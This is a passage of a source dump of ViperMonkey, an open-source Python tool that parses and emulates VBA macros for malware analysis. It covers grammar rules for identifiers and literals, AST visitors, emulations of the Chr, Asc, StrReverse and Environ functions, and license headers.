93 | 94 | # 3.3.5.2 Reserved Identifiers and IDENTIFIER 95 | # IDENTIFIER = <any lex-identifier that is not a reserved-identifier> 96 | 97 | identifier = NotAny(reserved_identifier) + lex_identifier 98 | 99 | # convert identifier to a string: 100 | identifier.setParseAction(lambda t: t[0]) 101 | 102 | # --- ENTITY NAMES ----------------------------------------------------------- 103 | 104 | # 3.3.5.3 Special Identifier Forms 105 | # 106 | # MS-GRAMMAR: FOREIGN-NAME = "[" foreign-identifier "]" 107 | # MS-GRAMMAR: foreign-identifier = 1*non-line-termination-character 108 | # 109 | # A <FOREIGN-NAME> is a token (section 3.3) that represents a text sequence that is used as if it 110 | # was an identifier but which does not conform to the VBA rules for forming an identifier. Typically, a 111 | # <FOREIGN-NAME> is used to refer to an entity (section 2.2) that is created using some 112 | # programming language other than VBA. 113 | 114 | foreign_name = Literal('[') + CharsNotIn('\x0D\x0A') + Literal(']') 115 | 116 | # MS-GRAMMAR: BUILTIN-TYPE = reserved-type-identifier / ("[" reserved-type-identifier "]") 117 | # / "object" / "[object]" 118 | 119 | builtin_type = reserved_type_identifier | (Suppress("[") + reserved_type_identifier + Suppress("]")) \ 120 | | CaselessKeyword("object") | CaselessLiteral("[object]") 121 | 122 | # A <TYPED-NAME> is an <IDENTIFIER> that is immediately followed by a <type-suffix> with no 123 | # intervening whitespace. 124 | # Type suffix Declared Type 125 | # % Integer 126 | # & Long 127 | # ^ LongLong 128 | # ! Single 129 | # # Double 130 | # @ Currency 131 | # $ String 132 | # Don't parse 'c&' in 'c& d& e' as a typed_name. It's a string concat.
133 | type_suffix = Word(r"%&^!#@$", exact=1) + \ 134 | NotAny(Optional(Regex(r" +")) + ((NotAny(reserved_keywords) + Word(alphanums)) | '"')) 135 | typed_name = Combine(identifier + type_suffix) 136 | 137 | # 5.1 Module Body Structure 138 | # Throughout this specification the following common grammar rules are used for expressing various 139 | # forms of entity (section 2.2) names: 140 | # TODO: for now, disabled foreign_name 141 | untyped_name = identifier #| foreign_name 142 | # NOTE: here typed_name must come before untyped_name 143 | entity_name = typed_name | untyped_name 144 | unrestricted_name = entity_name | reserved_identifier 145 | 146 | # --- TODO IDENTIFIER OR OBJECT.ATTRIB ---------------------------------------- 147 | 148 | base_attrib = Combine( 149 | NotAny(reserved_keywords) 150 | + (Combine(Literal('.') + lex_identifier) | Combine(entity_name + Optional(Literal('.') + lex_identifier))) 151 | + Optional(CaselessLiteral('$')) 152 | + Optional(CaselessLiteral('#')) 153 | + Optional(CaselessLiteral('%')) 154 | ) 155 | 156 | TODO_identifier_or_object_attrib = base_attrib ^ Suppress(Literal("{")) + base_attrib + Suppress(Literal("}")) 157 | 158 | base_attrib_loose = Combine( 159 | Combine(Literal('.') + lex_identifier) 160 | | Combine(entity_name + Optional(Literal('.') + lex_identifier)) 161 | + Optional(CaselessLiteral('$')) 162 | + Optional(CaselessLiteral('#')) 163 | + Optional(CaselessLiteral('%')) 164 | | Combine(entity_name + Literal('.') + lex_identifier + Literal('.') + lex_identifier) 165 | ) 166 | 167 | TODO_identifier_or_object_attrib_loose = base_attrib_loose ^ Suppress(Literal("{")) + base_attrib_loose + Suppress(Literal("}")) 168 | 169 | enum_val_id = Regex(re.compile(r"\[[^\]]+\]")) 170 | -------------------------------------------------------------------------------- /vipermonkey/core/let_statement_visitor.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: Visitor for 
collecting Let statements. 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
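# Illustrative sketch only, using hypothetical _SketchNode/_SketchLet classes
# rather than ViperMonkey's statement types: the visited-set pattern shared by
# the visitors in this package. visit() returns False for an item it has
# already seen; the walker (assumed here to be a plain depth-first traversal)
# then skips that item's children, so shared subtrees are processed once.
# Matching items are collected as a side effect, optionally filtered by
# variable name in the way let_statement_visitor filters on var_name.


class _SketchNode(object):
    def __init__(self, children=()):
        self.children = list(children)


class _SketchLet(_SketchNode):
    def __init__(self, name, children=()):
        super(_SketchLet, self).__init__(children)
        self.name = name


class _SketchLetCollector(object):
    def __init__(self, var_name=None):
        self.let_statements = []
        self.visited = set()
        self.var_name = var_name

    def visit(self, item):
        # Plain objects hash by identity, so each node is recorded at most once.
        if item in self.visited:
            return False
        self.visited.add(item)
        if isinstance(item, _SketchLet) and (self.var_name is None or item.name == self.var_name):
            self.let_statements.append(item)
        return True


def _sketch_walk(node, visitor):
    # Depth-first walk that stops descending as soon as visit() returns False.
    if not visitor.visit(node):
        return
    for child in node.children:
        _sketch_walk(child, visitor)

# Usage: if a tree reaches the same _SketchLet("a") object through two parents,
# _sketch_walk(tree, _SketchLetCollector("a")) records that object only once.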
38 | 39 | from visitor import * 40 | 41 | class let_statement_visitor(visitor): 42 | """ 43 | Get all Let statements. 44 | """ 45 | 46 | def __init__(self, var_name=None): 47 | self.let_statements = set() 48 | self.visited = set() 49 | self.var_name = var_name 50 | 51 | def visit(self, item): 52 | from statements import Let_Statement 53 | if (item in self.visited): 54 | return False 55 | self.visited.add(item) 56 | if ((isinstance(item, Let_Statement)) and 57 | ((self.var_name is None) or (item.name == self.var_name))): 58 | self.let_statements.add(item) 59 | return True 60 | -------------------------------------------------------------------------------- /vipermonkey/core/lhs_var_visitor.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: Visitor for collecting variables on the LHS of assignments. 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 
27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | import sys 40 | 41 | from visitor import * 42 | import pyparsing 43 | 44 | class lhs_var_visitor(visitor): 45 | """ 46 | Get the LHS of all Let statements. 47 | """ 48 | 49 | def __init__(self): 50 | self.variables = set() 51 | self.visited = set() 52 | 53 | def visit(self, item): 54 | from statements import Let_Statement 55 | 56 | if (str(item) in self.visited): 57 | return False 58 | self.visited.add(str(item)) 59 | if ("Let_Statement" in str(type(item))): 60 | if (isinstance(item.name, str)): 61 | self.variables.add(item.name) 62 | elif (isinstance(item.name, pyparsing.ParseResults) and 63 | (item.name[0].lower().replace("$", "").replace("#", "").replace("%", "") == "mid")): 64 | self.variables.add(str(item.name[1])) 65 | 66 | return True 67 | -------------------------------------------------------------------------------- /vipermonkey/core/lib_functions.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | ViperMonkey: VBA Grammar - Library Functions 4 | 5 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 6 | VBA macros (Visual Basic for 
Applications), mainly for malware analysis. 7 | 8 | Author: Philippe Lagadec - http://www.decalage.info 9 | License: BSD, see source code or documentation 10 | 11 | Project Repository: 12 | https://github.com/decalage2/ViperMonkey 13 | """ 14 | 15 | # === LICENSE ================================================================== 16 | 17 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 18 | # All rights reserved. 19 | # 20 | # Redistribution and use in source and binary forms, with or without modification, 21 | # are permitted provided that the following conditions are met: 22 | # 23 | # * Redistributions of source code must retain the above copyright notice, this 24 | # list of conditions and the following disclaimer. 25 | # * Redistributions in binary form must reproduce the above copyright notice, 26 | # this list of conditions and the following disclaimer in the documentation 27 | # and/or other materials provided with the distribution. 28 | # 29 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 30 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 31 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 32 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 33 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 34 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 35 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 36 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 37 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 38 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
39 | 40 | __version__ = '0.02' 41 | 42 | # --- IMPORTS ------------------------------------------------------------------ 43 | 44 | from curses_ascii import isprint 45 | import logging 46 | from pyparsing import * 47 | 48 | from vba_object import * 49 | from literals import * 50 | import vb_str 51 | 52 | from logger import log 53 | 54 | # --- VBA Expressions --------------------------------------------------------- 55 | 56 | # 5.6 Expressions 57 | # See below 58 | 59 | # any VBA expression: need to pre-declare using Forward() because it is recursive 60 | expression = Forward() 61 | 62 | # --- CHR -------------------------------------------------------------------- 63 | 64 | class Chr(VBA_Object): 65 | """ 66 | 6.1.2.11.1.4 VBA Chr function 67 | """ 68 | 69 | def __init__(self, original_str, location, tokens): 70 | super(Chr, self).__init__(original_str, location, tokens) 71 | # extract argument from the tokens: 72 | # Here the arg is expected to be either an int or a VBA_Object 73 | self.arg = tokens[0] 74 | if (log.getEffectiveLevel() == logging.DEBUG): 75 | log.debug('parsed %r as %s' % (self, self.__class__.__name__)) 76 | 77 | def to_python(self, context, params=None, indent=0): 78 | arg_str = to_python(self.arg, context) 79 | r = "core.vba_library.run_function(\"_Chr\", vm_context, [" + arg_str + "])" 80 | return r 81 | 82 | def return_type(self): 83 | return "STRING" 84 | 85 | def eval(self, context, params=None): 86 | 87 | # This is implemented in the common vba_library._Chr handler class. 
88 | import vba_library 89 | chr_handler = vba_library._Chr() 90 | param = eval_arg(self.arg, context) 91 | return chr_handler.eval(context, [param]) 92 | 93 | def __repr__(self): 94 | return 'Chr(%s)' % repr(self.arg) 95 | 96 | # Chr, Chr$, ChrB, ChrW() 97 | chr_ = ( 98 | Suppress(Regex(re.compile(r'Chr[BW]?\$?', re.IGNORECASE))) 99 | + Suppress('(') 100 | + expression 101 | + Suppress(')') 102 | ) 103 | chr_.setParseAction(Chr) 104 | 105 | # --- ASC -------------------------------------------------------------------- 106 | 107 | class Asc(VBA_Object): 108 | """ 109 | VBA Asc function 110 | """ 111 | 112 | def __init__(self, original_str, location, tokens): 113 | super(Asc, self).__init__(original_str, location, tokens) 114 | 115 | # This could be an asc(...) call or a reference to a variable called asc. 116 | # If there are parsed arguments it is a call. 117 | self.arg = None 118 | if (len(tokens) > 0): 119 | # Here the arg is expected to be either a character or a VBA_Object 120 | self.arg = tokens[0] 121 | 122 | def to_python(self, context, params=None, indent=0): 123 | return "ord(" + to_python(self.arg, context) + ")" 124 | 125 | def return_type(self): 126 | return "INTEGER" 127 | 128 | def eval(self, context, params=None): 129 | 130 | # Are we just looking up a variable called 'asc'? 131 | if (self.arg is None): 132 | try: 133 | return context.get("asc") 134 | except KeyError: 135 | return "NULL" 136 | 137 | # Eval the argument. 138 | c = eval_arg(self.arg, context) 139 | 140 | # Don't modify the "**MATCH ANY**" special value. 141 | c_str = None 142 | try: 143 | c_str = str(c).strip() 144 | except UnicodeEncodeError: 145 | c_str = filter(isprint, c).strip() 146 | if (c_str == "**MATCH ANY**"): 147 | return c 148 | 149 | # Treat Asc(NULL) as 0. 150 | if (c == "NULL"): 151 | return 0 152 | 153 | # Calling Asc() on int? 154 | if (isinstance(c, int)): 155 | r = c 156 | else: 157 | 158 | # Got a string. 159 | 160 | # Should this match anything?
161 | if (c_str == "**MATCH ANY**"): 162 | r = "**MATCH ANY**" 163 | 164 | # This is an unmodified Asc() call. 165 | else: 166 | r = vb_str.get_ms_ascii_value(c_str) 167 | 168 | # Return the result. 169 | if (log.getEffectiveLevel() == logging.DEBUG): 170 | log.debug("Asc: return %r" % r) 171 | return r 172 | 173 | def __repr__(self): 174 | return 'Asc(%s)' % repr(self.arg) 175 | 176 | 177 | # Asc() 178 | # TODO: see MS-VBAL 6.1.2.11.1.1 page 240 => AscB, AscW 179 | asc = Suppress((CaselessKeyword('Asc') | CaselessKeyword('AscW'))) + Optional(Suppress('(') + expression + Suppress(')')) 180 | asc.setParseAction(Asc) 181 | 182 | # --- StrReverse() -------------------------------------------------------------------- 183 | 184 | class StrReverse(VBA_Object): 185 | """ 186 | VBA StrReverse function 187 | """ 188 | 189 | def __init__(self, original_str, location, tokens): 190 | super(StrReverse, self).__init__(original_str, location, tokens) 191 | # extract argument from the tokens: 192 | # Here the arg is expected to be either a string or a VBA_Object 193 | self.arg = tokens[0] 194 | 195 | def return_type(self): 196 | return "STRING" 197 | 198 | def eval(self, context, params=None): 199 | # return the string with all characters in reverse order: 200 | return eval_arg(self.arg, context)[::-1] 201 | 202 | def __repr__(self): 203 | return 'StrReverse(%s)' % repr(self.arg) 204 | 205 | # StrReverse() 206 | strReverse = Suppress(CaselessLiteral('StrReverse') + Literal('(')) + expression + Suppress(Literal(')')) 207 | strReverse.setParseAction(StrReverse) 208 | 209 | # --- ENVIRON() -------------------------------------------------------------------- 210 | 211 | class Environ(VBA_Object): 212 | """ 213 | VBA Environ function 214 | """ 215 | 216 | def __init__(self, original_str, location, tokens): 217 | super(Environ, self).__init__(original_str, location, tokens) 218 | # extract argument from the tokens: 219 | # Here the arg is expected to be either a string or a VBA_Object 
220 | self.arg = tokens.arg 221 | 222 | def return_type(self): 223 | return "STRING" 224 | 225 | def eval(self, context, params=None): 226 | # return the environment variable name surrounded by % signs: 227 | # e.g. Environ("TEMP") => "%TEMP%" 228 | arg = eval_arg(self.arg, context=context) 229 | value = '%%%s%%' % arg 230 | if (log.getEffectiveLevel() == logging.DEBUG): 231 | log.debug('evaluating Environ(%s) => %r' % (arg, value)) 232 | return value 233 | 234 | def __repr__(self): 235 | return 'Environ(%s)' % repr(self.arg) 236 | 237 | # Environ("name") => just translated to "%name%", that is enough for malware analysis 238 | environ = Suppress(CaselessKeyword('Environ') + '(') + expression('arg') + Suppress(')') 239 | environ.setParseAction(Environ) 240 | -------------------------------------------------------------------------------- /vipermonkey/core/literals.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | ViperMonkey: VBA Grammar - Literals 4 | 5 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 6 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 7 | 8 | Author: Philippe Lagadec - http://www.decalage.info 9 | License: BSD, see source code or documentation 10 | 11 | Project Repository: 12 | https://github.com/decalage2/ViperMonkey 13 | """ 14 | 15 | # === LICENSE ================================================================== 16 | 17 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 18 | # All rights reserved. 19 | # 20 | # Redistribution and use in source and binary forms, with or without modification, 21 | # are permitted provided that the following conditions are met: 22 | # 23 | # * Redistributions of source code must retain the above copyright notice, this 24 | # list of conditions and the following disclaimer. 
25 | # * Redistributions in binary form must reproduce the above copyright notice, 26 | # this list of conditions and the following disclaimer in the documentation 27 | # and/or other materials provided with the distribution. 28 | # 29 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 30 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 31 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 32 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 33 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 34 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 35 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 36 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 37 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 38 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
39 | 40 | __version__ = '0.02' 41 | 42 | # --- IMPORTS ------------------------------------------------------------------ 43 | 44 | import logging 45 | import re 46 | 47 | from pyparsing import * 48 | 49 | from logger import log 50 | from vba_object import VBA_Object 51 | 52 | # --- BOOLEAN ------------------------------------------------------------ 53 | 54 | boolean_literal = Regex(re.compile('(True|False)', re.IGNORECASE)) 55 | boolean_literal.setParseAction(lambda t: bool(t[0].lower() == 'true')) 56 | 57 | # --- NUMBER TOKENS ---------------------------------------------------------- 58 | 59 | # 3.3.2 Number Tokens 60 | # 61 | # MS-GRAMMAR: INTEGER = integer-literal ["%" / "&" / "^"] 62 | # MS-GRAMMAR: integer-literal = decimal-literal / octal-literal / hex-literal 63 | # MS-GRAMMAR: decimal-literal = 1*decimal-digit 64 | # MS-GRAMMAR: octal-literal = "&" [%x004F / %x006F] 1*octal-digit ; & or &o or &O 65 | # MS-GRAMMAR: hex-literal = "&" (%x0048 / %x0068) 1*hex-digit; &h or &H 66 | # MS-GRAMMAR: octal-digit = "0" / "1" / "2" / "3" / "4" / "5" / "6" / "7" 67 | # MS-GRAMMAR: decimal-digit = octal-digit / "8" / "9" 68 | # MS-GRAMMAR: hex-digit = decimal-digit / %x0041-0046 / %x0061-0066 ;A-F / a-f 69 | 70 | # a single Regex is used so that no whitespace is allowed between the digits and the type suffix: 71 | decimal_literal = Regex(re.compile('(?P<value>[+\-]?\d+)[%&^]?[!#@]?')) 72 | decimal_literal.setParseAction(lambda t: int(t.value)) 73 | 74 | octal_literal = Regex(re.compile('&o?(?P<value>[0-7]+)[%&^]?', re.IGNORECASE)) 75 | octal_literal.setParseAction(lambda t: int(t.value, base=8)) 76 | 77 | hex_literal = Regex(re.compile('&h(?P<value>[0-9a-f]+)[%&^]?', re.IGNORECASE)) 78 | hex_literal.setParseAction(lambda t: int(t.value, base=16)) 79 | 80 | integer = decimal_literal | octal_literal | hex_literal 81 | 82 | # MS-GRAMMAR: decimal_int = (WordStart(alphanums) + Word(nums)) 83 | # MS-GRAMMAR: 
decimal_int.setParseAction(lambda t: int(t[0])) 84 | # 85 | # NOTE: here WordStart is to avoid matching a number preceded
by letters (e.g. "VBT1"), when using scanString 86 | # TO DO: remove WordStart if scanString is not used 87 | 88 | # MS-GRAMMAR: FLOAT = (floating-point-literal [floating-point-type-suffix] ) / (decimal-literal floating- 89 | # MS-GRAMMAR: point-type-suffix) 90 | # MS-GRAMMAR: floating-point-literal = (integer-digits exponent) / (integer-digits "." [fractional-digits] 91 | # MS-GRAMMAR: [exponent]) / ( "." fractional-digits [exponent]) 92 | # MS-GRAMMAR: integer-digits = decimal-literal 93 | # MS-GRAMMAR: fractional-digits = decimal-literal 94 | # MS-GRAMMAR: exponent = exponent-letter [sign] decimal-literal 95 | # MS-GRAMMAR: exponent-letter = %x0044 / %x0045 / %x0064 / %x0065 96 | # MS-GRAMMAR: floating-point-type-suffix = "!" / "#" / "@" 97 | 98 | float_literal = Regex(re.compile('(?P<value>[+\-]?\d+\.\d*([eE][+\-]?\d+)?)[!#@]?')) | \ 99 | Regex(re.compile('(?P<value>[+\-]?\d+[eE][+\-]?\d+)[!#@]?')) 100 | float_literal.setParseAction(lambda t: float(t.value)) 101 | # --- QUOTED STRINGS --------------------------------------------------------- 102 | 103 | # 3.3.4 String Tokens 104 | # 105 | # MS-GRAMMAR: STRING = double-quote *string-character (double-quote / line-continuation / LINE-END) 106 | # MS-GRAMMAR: double-quote = %x0022 ; " 107 | # MS-GRAMMAR: string-character = NO-LINE-CONTINUATION ((double-quote double-quote) termination-character) 108 | 109 | class String(VBA_Object): 110 | 111 | def __init__(self, original_str, location, tokens): 112 | super(String, self).__init__(original_str, location, tokens) 113 | self.value = tokens[0] 114 | if (log.getEffectiveLevel() == logging.DEBUG): 115 | log.debug('parsed "%r" as String' % self) 116 | 117 | def __repr__(self): 118 | return '"' + str(self.value) + '"' 119 | 120 | def eval(self, context, params=None): 121 | r = self.value 122 | if (log.getEffectiveLevel() == logging.DEBUG): 123 | log.debug("String.eval: return " + r) 124 | return r 125 | 126 | def to_python(self, context, params=None, indent=0): 
127 | # Escape some
characters. 128 | r = str(self.value).\ 129 | replace("\\", "\\\\").\ 130 | replace('"', '\\"').\ 131 | replace("\n", "\\n").\ 132 | replace("\t", "\\t").\ 133 | replace("\r", "\\r") 134 | for i in range(0, 9): 135 | repl = hex(i).replace("0x", "") 136 | if (len(repl) == 1): 137 | repl = "0" + repl 138 | repl = "\\x" + repl 139 | r = r.replace(chr(i), repl) 140 | for i in range(11, 13): 141 | repl = hex(i).replace("0x", "") 142 | if (len(repl) == 1): 143 | repl = "0" + repl 144 | repl = "\\x" + repl 145 | r = r.replace(chr(i), repl) 146 | for i in range(14, 32): 147 | repl = hex(i).replace("0x", "") 148 | if (len(repl) == 1): 149 | repl = "0" + repl 150 | repl = "\\x" + repl 151 | r = r.replace(chr(i), repl) 152 | for i in range(127, 256): 153 | repl = hex(i).replace("0x", "") 154 | if (len(repl) == 1): 155 | repl = "0" + repl 156 | repl = "\\x" + repl 157 | r = r.replace(chr(i), repl) 158 | return '"' + r + '"' 159 | 160 | # NOTE: QuotedString creates a regex, so speed should not be an issue.
161 | #quoted_string = (QuotedString('"', escQuote='""') | QuotedString("'", escQuote="''"))('value') 162 | quoted_string = QuotedString('"', escQuote='""', convertWhitespaceEscapes=False)('value') 163 | quoted_string.setParseAction(String) 164 | 165 | quoted_string_keep_quotes = QuotedString('"', escQuote='""', unquoteResults=False, convertWhitespaceEscapes=False) 166 | quoted_string_keep_quotes.setParseAction(lambda t: str(t[0])) 167 | 168 | # --- DATE TOKENS ------------------------------------------------------------ 169 | 170 | # TODO: 3.3.3 Date Tokens 171 | # 172 | # MS-GRAMMAR: DATE = "#" *WSC [date-or-time *WSC] "#" 173 | # MS-GRAMMAR: date-or-time = (date-value 1*WSC time-value) / date-value / time-value 174 | # MS-GRAMMAR: date-value = left-date-value date-separator middle-date-value [date-separator right-date- 175 | # value] 176 | # MS-GRAMMAR: left-date-value = decimal-literal / month-name 177 | # MS-GRAMMAR: middle-date-value = decimal-literal / month-name 178 | # MS-GRAMMAR: right-date-value = decimal-literal / month-name 179 | # MS-GRAMMAR: date-separator = 1*WSC / (*WSC ("/" / "-" / ",") *WSC) 180 | # MS-GRAMMAR: month-name = English-month-name / English-month-abbreviation 181 | # MS-GRAMMAR: English-month-name = "january" / "february" / "march" / "april" / "may" / "june" / "august" / "september" / "october" / "november" / "december" 182 | # MS-GRAMMAR: English-month-abbreviation = "jan" / "feb" / "mar" / "apr" / "jun" / "jul" / "aug" / "sep" / "oct" / "nov" / "dec" 183 | # MS-GRAMMAR: time-value = (hour-value ampm) / (hour-value time-separator minute-value [time-separator 184 | # MS-GRAMMAR: second-value] [ampm]) 185 | # MS-GRAMMAR: hour-value = decimal-literal 186 | # MS-GRAMMAR: minute-value = decimal-literal 187 | # MS-GRAMMAR: second-value = decimal-literal 188 | # MS-GRAMMAR: time-separator = *WSC (":" / ".") *WSC 189 | # MS-GRAMMAR: ampm = *WSC ("am" / "pm" / "a" / "p") 190 | 191 | # TODO: For now just handle a date literal as a string. 
192 | date_string = QuotedString('#') 193 | date_string.setParseAction(lambda t: str(t[0])) 194 | 195 | # --- LITERALS --------------------------------------------------------------- 196 | 197 | # TODO: 5.6.5 Literal Expressions 198 | 199 | literal = boolean_literal | integer | quoted_string | date_string | float_literal 200 | literal.setParseAction(lambda t: t[0]) 201 | 202 | -------------------------------------------------------------------------------- /vipermonkey/core/logger.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | vipermonkey logging helper 4 | 5 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 6 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 7 | 8 | Author: Philippe Lagadec - http://www.decalage.info 9 | License: BSD, see source code or documentation 10 | 11 | Project Repository: 12 | https://github.com/decalage2/ViperMonkey 13 | """ 14 | 15 | # === LICENSE ================================================================== 16 | 17 | # ViperMonkey is copyright (c) 2015-2019 Philippe Lagadec (http://www.decalage.info) 18 | # All rights reserved. 19 | # 20 | # Redistribution and use in source and binary forms, with or without modification, 21 | # are permitted provided that the following conditions are met: 22 | # 23 | # * Redistributions of source code must retain the above copyright notice, this 24 | # list of conditions and the following disclaimer. 25 | # * Redistributions in binary form must reproduce the above copyright notice, 26 | # this list of conditions and the following disclaimer in the documentation 27 | # and/or other materials provided with the distribution. 
28 | # 29 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 30 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 31 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 32 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 33 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 34 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 35 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 36 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 37 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 38 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 39 | 40 | 41 | # ------------------------------------------------------------------------------ 42 | # CHANGELOG: 43 | # 2015-02-12 v0.01 PL: - first prototype 44 | # 2015-2016 PL: - many updates 45 | # 2016-06-11 v0.02 PL: - split vipermonkey into several modules 46 | 47 | __version__ = '0.08' 48 | 49 